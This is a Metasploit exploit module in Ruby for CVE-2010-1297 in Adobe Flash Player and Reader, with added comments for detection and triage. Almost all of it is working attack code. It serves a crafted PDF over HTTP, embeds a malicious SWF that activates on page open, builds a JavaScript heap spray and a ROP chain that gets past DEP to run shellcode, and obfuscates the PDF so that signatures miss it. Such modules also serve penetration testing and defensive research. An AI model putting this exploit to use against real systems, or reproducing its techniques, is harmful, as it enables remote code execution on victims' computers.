Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zlib'

# Browser/reader exploit module.  #exploit loads a static SWF from the
# framework data directory; every HTTP request is then answered from
# #on_request_uri with a freshly generated PDF that embeds that SWF as a
# RichMedia annotation and carries an /OpenAction JavaScript action built by
# #make_js around the per-client encoded payload.
#
# Notes for detection and sample triage, all visible in what this file emits:
#   * the response is Content-Type application/pdf with Pragma no-cache and,
#     per 'DefaultOptions', gzip-compressed and chunked -- inline inspection
#     has to de-chunk and inflate before the PDF is visible;
#   * the JavaScript stream is ASCIIHex- then Flate-encoded and PDF name
#     tokens are randomly rewritten as #xx escapes (see #n_obfu), so
#     name-based signatures must decode filters and normalise names first;
#   * the SWF is stored unmodified in the /EmbeddedFile stream of object 16
#     and can be carved from there for offline analysis;
#   * the RichMedia activation condition is /PO (page open), i.e. the
#     content starts without user interaction.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers module metadata: name, description, authors, references,
  # default HTTP/handler options, payload constraints (1000 bytes, no NUL
  # byte, no NOP sled) and the single 'Automatic' target.
  #
  # @param info [Hash] metadata to merge via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Adobe Flash Player "newfunction" Invalid Pointer Use',
      'Description'    => %q{
        This module exploits a vulnerability in the DoABC tag handling within
        versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also
        vulnerable, as are any other applications that may embed Flash player.

        Arbitrary code execution is achieved by embedding a specially crafted Flash
        movie into a PDF document. An AcroJS heap spray is used in order to ensure
        that the memory used by the invalid pointer issue is controlled.

        NOTE: This module uses a similar DEP bypass method to that used within the
        adobe_libtiff module. This method is unlikely to work across various
        Windows versions due a hardcoded syscall number.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Found being openly exploited
          'jduck'    # Metasploit version
        ],
      'References'     =>
        [
          ['CVE', '2010-1297'],
          ['OSVDB', '65141'],
          ['BID', '40586'],
          ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],
          # For SWF->PDF embedding
          ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'HTTP::compression' => 'gzip',
          'HTTP::chunked' => true,
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd
          # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
          # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
          [ 'Automatic', { }],
        ],
      'DisclosureDate' => '2010-06-04',
      'DefaultTarget'  => 0))
  end

  # Reads the static CVE-2010-1297.swf from the framework data directory into
  # @swf_data, then hands over to the HTTP server (super).
  #
  # @raise [Errno::ENOENT] if the data file is missing -- File.open is not
  #   guarded, so the failure surfaces when the module is run
  # NOTE(review): File.binread(path) would do the open/read/close in one call
  # and would not leak the descriptor if read raised before fd.close.
  def exploit
    # load the static swf file
    path = File.join( Msf::Config.data_directory, "exploits", "CVE-2010-1297.swf" )
    fd = File.open( path, "rb" )
    @swf_data = fd.read(fd.stat.size)
    fd.close

    super
  end

  # Serves one crafted PDF per request.  The payload is regenerated for the
  # client, wrapped in JavaScript by #make_js, combined with @swf_data by
  # #make_pdf and sent as application/pdf with Pragma: no-cache; the payload
  # handler is then started for that client.  The request object is not
  # inspected here.
  #
  # @param cli the client connection, passed through to regenerate_payload,
  #   send_response and handler
  # @param request the HTTP request (unused by this method)
  def on_request_uri(cli, request)

    print_status("Sending crafted PDF w/SWF")

    js_data = make_js(regenerate_payload(cli).encoded)
    pdf_data = make_pdf(@swf_data, js_data)
    send_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })

    # Handle the payload
    handler(cli)
  end


  # Builds the AcroJS placed in the PDF's /OpenAction.
  #
  # stack_data is the gadget/argument list annotated inline below, packed as
  # little-endian 32-bit words ('V*'); the module description notes the
  # hard-coded syscall number that ties it to specific Windows builds.  It is
  # concatenated with encoded_payload, rendered as %u escapes by
  # Rex::Text.to_unescape and decoded in the script through an aliased
  # unescape.  The script pads a "%u0c0c%u0c0c" string (assembled from
  # one-character pieces) up to var_s by repeated doubling, places the decoded
  # buffer inside it, grows the result to just under 0x80000 characters and
  # keeps 0x1f0 copies in an array.  Every JavaScript identifier is a random
  # alphabetic name of 1-100 characters, so the script text differs per call.
  #
  # @param encoded_payload [String] the encoded payload bytes
  # @return [String] JavaScript source
  # NOTE(review): var_start is assigned but never referenced.
  def make_js(encoded_payload)

    # The following executes a ret2lib using BIB.dll
    # The effect is to bypass DEP and execute the shellcode in an indirect way
    stack_data = [
      0xc0c0c0c,
      0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret
      0xcccccccc,
      0x70048ef, # xchg eax,esp / ret
      0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]
      0xcccccccc,
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009033, # ret 0x18
      0x7009084, # ret
      0xc0c0c0c,
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7001599, # pop ebp / ret
      0x10124,
      0x70072f7, # pop eax / ret
      0x10104,
      0x70015bb, # pop ecx / ret
      0x1000,
      0x700154d, # mov [eax], ecx / ret
      0x70015bb, # pop ecx / ret
      0x7ffe0300, # -- location of KiFastSystemCall
      0x7007fb2, # mov eax, [ecx] / ret
      0x70015bb, # pop ecx / ret
      0x10011,
      0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
      0x70015bb, # pop ecx / ret
      0x10100,
      0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
      0x70072f7, # pop eax / ret
      0x10011,
      0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
      0x7005c54, # pop esi / add esp,0x14 / ret
      0xffffffff,
      0x10100,
      0x0,
      0x10104,
      0x1000,
      0x40,
      # The next bit effectively copies data from the interleaved stack to the memory
      # pointed to by eax
      # The data copied is:
      # \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83
      # \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff
      # \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90
      0x700d731, # mov eax, [ebp-0x24] / ret
      0x70015bb, # pop ecx / ret
      0x9054905a,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x5815eb5a,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x18891a8b,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x8304c083,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xfb8104c2,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xc0c0c0c,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x5ebee75,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xffffe6e8,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x909090ff,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90909090,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90909090,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90ffffff,
      0x700154d, # mov [eax], ecx / ret
      0x700d731, # mov eax, [ebp-0x24] / ret
      0x700112f # call eax -- (execute stub to transition to full shellcode)
    ].pack('V*')

    var_unescape = rand_text_alpha(rand(100) + 1)
    var_shellcode = rand_text_alpha(rand(100) + 1)

    var_start = rand_text_alpha(rand(100) + 1)

    var_s = 0x10000
    var_c = rand_text_alpha(rand(100) + 1)
    var_b = rand_text_alpha(rand(100) + 1)
    var_d = rand_text_alpha(rand(100) + 1)
    var_3 = rand_text_alpha(rand(100) + 1)
    var_i = rand_text_alpha(rand(100) + 1)
    var_4 = rand_text_alpha(rand(100) + 1)

    # gadget list first, encoded payload appended directly after it
    payload_buf = ''
    payload_buf << stack_data
    payload_buf << encoded_payload

    escaped_payload = Rex::Text.to_unescape(payload_buf)

    js = %Q|
var #{var_unescape} = unescape;
var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
#{var_b} += #{var_shellcode};
#{var_b} += #{var_c};
#{var_d} = #{var_b}.substring(0, #{var_s}/2);
while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
var #{var_4} = new Array();
for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";
|

    js
  end

  # Returns a string of `count` single-byte characters in the range
  # 0x80..0xff.  Only referenced from the commented-out binary-comment line
  # in #make_pdf, so it is currently dead code.
  #
  # @param count [Integer] number of bytes to generate
  # @return [String]
  def random_non_ascii_string(count)
    result = ""
    count.times do
      result << (rand(128) + 128).chr
    end
    result
  end

  # PDF indirect object header, e.g. "5 0 obj\n".
  #
  # @param id [Integer] object number (generation is always 0)
  # @return [String]
  def io_def(id)
    "%d 0 obj\n" % id
  end

  # PDF indirect object reference, e.g. "5 0 R".
  #
  # @param id [Integer] object number (generation is always 0)
  # @return [String]
  def io_ref(id)
    "%d 0 R" % id
  end


  # Randomly rewrites ASCII letters of a PDF fragment as #xx hex escapes (the
  # PDF name-object escape), so that keys such as /Type/Catalog vary between
  # generated files.  Each letter is escaped with probability 1/2 (rand(2));
  # every other character is copied through unchanged.
  #
  # NOTE(review): callers also pass parenthesised string literals such as
  # "(#{swf_name})" through here; #xx is not an escape inside PDF strings, so
  # those literals may no longer equal the unescaped swf_name written to /NM --
  # confirm the viewer tolerates the mismatch before relying on it.
  #
  # @param str [String] PDF source fragment
  # @return [String] the fragment with some letters escaped
  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
  def n_obfu(str)
    result = ""
    str.scan(/./u) do |c|
      # low-precedence `and` is safe here: no assignment in the condition
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
        result << "#%x" % c.unpack("C*")[0]
      else
        result << c
      end
    end
    result
  end


  # Encodes str for an /ASCIIHexDecode filter: two hex digits per byte,
  # separated by 1-3 random spaces (the filter ignores whitespace), and
  # terminated with the '>' end-of-data marker.
  #
  # @param str [String] raw bytes
  # @return [String] hex text ending in '>'
  def ascii_hex_whitespace_encode(str)
    result = ""
    whitespace = ""
    str.each_byte do |b|
      # "%02x" % b binds tighter than <<, so the byte is formatted first
      result << whitespace << "%02x" % b
      whitespace = " " * (rand(3) + 1)
    end
    result << ">"
  end


  # Assembles the PDF.  Objects emitted, in order (there is no object 2):
  #   1  Catalog, /OpenAction -> 5
  #   3  Pages; 4 Page with /Annots -> 7
  #   5  JavaScript action; 6 its Flate+ASCIIHex encoded stream (js)
  #   7  RichMedia annotation -> settings 8, content 9
  #   8  RichMediaSettings -> activation 10 (/PO), deactivation 11 (/XD)
  #   9  RichMediaContent -> assets 12, configurations [14]
  #   12 Names -> filespec 13; 13 Filespec -> embedded file 16
  #   14 RichMediaConfiguration -> instances [15]; 15 RichMediaInstance -> 13
  #   16 EmbeddedFile stream holding the SWF bytes unchanged
  # followed by a classic xref table and trailer.
  #
  # NOTE(review): the xref subsection is written as "0 N" with consecutive
  # object numbers, but object 2 is never emitted, so every entry after the
  # first maps to the wrong object number and /Size (16) is not greater than
  # the highest object number (16).  The tested viewers evidently rebuild the
  # table, but a strict parser may not.
  # NOTE(review): each xref entry is 19 bytes here (eol is "\n" only); the
  # PDF specification calls for 20-byte entries.
  #
  # @param swf [String] SWF bytes, stored without further compression
  # @param js [String] JavaScript source for the OpenAction
  # @return [String] the complete PDF
  def make_pdf(swf, js)

    swf_name = rand_text_alpha(8 + rand(8)) + ".swf"

    xref = []
    eol = "\n"
    endobj = "endobj" << eol

    # Randomize PDF version?
    pdf = "%PDF-1.5" << eol
    #pdf << "%" << random_non_ascii_string(4) << eol

    # catalog
    xref << pdf.length
    pdf << io_def(1) << n_obfu("<</Type/Catalog")
    pdf << n_obfu("/Pages ") << io_ref(3)
    pdf << n_obfu("/OpenAction ") << io_ref(5)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # pages array
    xref << pdf.length
    pdf << io_def(3) << n_obfu("<</Type/Pages/Count 1/Kids [") << io_ref(4) << n_obfu("]>>") << eol << endobj

    # page 1
    xref << pdf.length
    pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3)
    pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("] ")
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # js action
    xref << pdf.length
    # + binds tighter than <<, so the dictionary text is joined before appending
    pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << eol << endobj

    # js stream
    xref << pdf.length
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
    pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
    pdf << "stream" << eol
    pdf << compressed << eol
    pdf << "endstream" << eol
    pdf << endobj

    # swf annotation object
    xref << pdf.length
    pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype/RichMedia")
    pdf << n_obfu("/Rect [20 20 187 69] ")
    pdf << n_obfu("/RichMediaSettings ") << io_ref(8)
    pdf << n_obfu("/RichMediaContent ") << io_ref(9)
    pdf << n_obfu("/NM (") << swf_name << n_obfu(")")
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media settings
    xref << pdf.length
    pdf << io_def(8)
    pdf << n_obfu("<</Type/RichMediaSettings/Subtype/Flash")
    pdf << n_obfu("/Activation ") << io_ref(10)
    pdf << n_obfu("/Deactivation ") << io_ref(11)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media content
    xref << pdf.length
    pdf << io_def(9)
    pdf << n_obfu("<</Type/RichMediaContent")
    pdf << n_obfu("/Assets ") << io_ref(12)
    pdf << n_obfu("/Configurations [") << io_ref(14) << "]"
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media activation / deactivation
    xref << pdf.length
    pdf << io_def(10)
    pdf << n_obfu("<</Type/RichMediaActivation/Condition/PO>>")
    pdf << eol << endobj

    xref << pdf.length
    pdf << io_def(11)
    pdf << n_obfu("<</Type/RichMediaDeactivation/Condition/XD>>")
    pdf << eol << endobj

    # rich media assets
    xref << pdf.length
    pdf << io_def(12)
    pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu("]>>")
    pdf << eol << endobj

    # swf embedded file ref
    xref << pdf.length
    pdf << io_def(13)
    pdf << n_obfu("<</Type/Filespec /EF <</F ") << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")
    pdf << eol << endobj

    # rich media configuration
    xref << pdf.length
    pdf << io_def(14)
    pdf << n_obfu("<</Type/RichMediaConfiguration/Subtype/Flash")
    pdf << n_obfu("/Instances [") << io_ref(15) << n_obfu("]>>")
    pdf << eol << endobj

    # rich media instance
    xref << pdf.length
    pdf << io_def(15)
    pdf << n_obfu("<</Type/RichMediaInstance/Subtype/Flash")
    pdf << n_obfu("/Asset ") << io_ref(13)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # swf stream
    # NOTE: This data is already compressed, no need to compress it again...
    xref << pdf.length
    pdf << io_def(16) << n_obfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol
    pdf << "stream" << eol
    pdf << swf << eol
    pdf << "endstream" << eol
    pdf << endobj

    # trailing stuff
    # xref holds the byte offset of each object header in emission order
    # (objects 1, 3, 4, ..., 16); see the NOTE(review) above on numbering
    xrefPosition = pdf.length
    pdf << "xref" << eol
    pdf << "0 %d" % (xref.length + 1) << eol
    pdf << "0000000000 65535 f" << eol
    xref.each do |index|
      pdf << "%010d 00000 n" % index << eol
    end

    pdf << "trailer" << eol
    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol

    pdf << "startxref" << eol
    pdf << xrefPosition.to_s() << eol

    pdf << "%%EOF" << eol

  end
end